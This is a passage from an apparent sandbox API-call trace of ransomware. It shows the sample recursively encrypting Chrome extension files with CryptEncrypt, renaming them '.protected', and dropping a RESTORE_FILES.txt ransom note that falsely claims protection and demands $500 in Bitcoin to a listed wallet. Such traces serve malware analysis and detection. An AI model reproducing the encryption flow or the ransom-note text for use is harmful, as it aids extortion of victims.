liDistanceToMove=0xfffffa4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.306] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5b1, lpOverlapped=0x0) returned 1 [0080.306] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.306] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.306] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.306] CloseHandle (hObject=0x160) returned 1 [0080.306] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.protected") returned 153 [0080.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.protected")) returned 1 [0080.307] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.307] lstrcmpiW (lpString1="page_embed_script.js", lpString2="Windows") returned -1 [0080.307] lstrcmpiW (lpString1="page_embed_script.js", lpString2="Program Files") returned -1 [0080.307] lstrcmpiW (lpString1="page_embed_script.js", lpString2="Program Files (x86)") returned -1 [0080.307] lstrcmpiW (lpString1="page_embed_script.js", lpString2="$Recycle.bin") returned 1 [0080.307] lstrcmpiW (lpString1="page_embed_script.js", lpString2="System Volume Information") returned -1 [0080.307] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js") returned 150 [0080.307] StrStrIW (lpFirst="page_embed_script.js", lpSrch=".protected") returned 0x0 [0080.307] lstrcmpW (lpString1="page_embed_script.js", lpString2="RESTORE_FILES.txt") returned -1 [0080.307] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.307] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x160 [0080.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js") returned 150 [0080.308] StrStrW (lpFirst="page_embed_script.js", lpSrch=".txt") returned 0x0 [0080.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js") returned 150 [0080.308] StrStrW (lpFirst="page_embed_script.js", lpSrch=".rar") returned 0x0 [0080.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js") returned 150 [0080.308] StrStrW (lpFirst="page_embed_script.js", lpSrch=".zip") returned 0x0 [0080.308] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xe0, lpOverlapped=0x0) returned 1 [0080.309] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.309] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xe0, lpOverlapped=0x0) returned 1 [0080.309] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.309] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.309] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.309] CloseHandle (hObject=0x160) returned 1 [0080.309] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.protected") returned 160 [0080.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.protected")) returned 1 [0080.310] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.310] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0080.310] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0080.310] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0080.310] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0080.310] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0080.310] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales") returned 138 [0080.310] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0080.310] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0080.310] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\*") returned 140 [0080.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.320] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.320] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.320] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.320] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.320] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.320] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\.") returned 140 [0080.320] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.320] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.321] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.321] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.321] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.321] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.321] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned 
-1 [0080.321] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\..") returned 141 [0080.321] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.321] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.321] lstrcmpiW (lpString1="af", lpString2="Windows") returned -1 [0080.321] lstrcmpiW (lpString1="af", lpString2="Program Files") returned -1 [0080.321] lstrcmpiW (lpString1="af", lpString2="Program Files (x86)") returned -1 [0080.321] lstrcmpiW (lpString1="af", lpString2="$Recycle.bin") returned 1 [0080.321] lstrcmpiW (lpString1="af", lpString2="System Volume Information") returned -1 [0080.321] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af") returned 141 [0080.321] lstrcmpW (lpString1="af", lpString2=".") returned 1 [0080.321] lstrcmpW (lpString1="af", lpString2="..") returned 1 [0080.321] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\*") returned 143 [0080.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.322] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.322] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
[0080.322] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.322] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.322] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.322] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\.") returned 143 [0080.322] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.322] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.323] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.323] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.323] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.323] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.323] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.323] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\..") returned 144 [0080.323] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.323] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.323] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.323] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.323] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.323] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.323] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.323] lstrcmpiW 
(lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.323] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json") returned 155 [0080.323] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.323] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.323] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.323] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.324] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json") returned 155 [0080.324] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.324] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json") returned 155 [0080.324] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.324] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json") returned 155 [0080.324] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.324] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x84, lpOverlapped=0x0) returned 1 [0080.325] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.325] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x84, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x84, lpOverlapped=0x0) returned 1 [0080.325] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.325] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.326] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.326] CloseHandle (hObject=0x168) returned 1 [0080.326] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.protected") returned 165 [0080.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.protected")) returned 1 [0080.327] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.327] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.327] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\RESTORE_FILES.txt") returned 159 [0080.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.328] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.328] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.328] lstrlenA (lpString="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") returned 684 [0080.329] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0080.329] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.329] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.329] CloseHandle (hObject=0x164) returned 1 [0080.329] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.329] lstrcmpiW (lpString1="am", lpString2="Windows") returned -1 [0080.329] lstrcmpiW (lpString1="am", lpString2="Program Files") returned -1 [0080.329] lstrcmpiW (lpString1="am", lpString2="Program Files (x86)") returned -1 [0080.329] lstrcmpiW (lpString1="am", lpString2="$Recycle.bin") returned 1 [0080.329] lstrcmpiW (lpString1="am", lpString2="System Volume Information") returned -1 [0080.329] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am") returned 141 [0080.329] lstrcmpW (lpString1="am", lpString2=".") returned 1 [0080.329] lstrcmpW (lpString1="am", lpString2="..") returned 1 [0080.329] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\*") returned 143 [0080.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.329] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0080.329] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.329] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.330] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.330] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.330] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\.") returned 143 [0080.330] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.330] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.330] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.330] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.330] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.330] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.330] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.330] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\..") returned 144 [0080.330] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.330] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.330] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.330] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.330] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
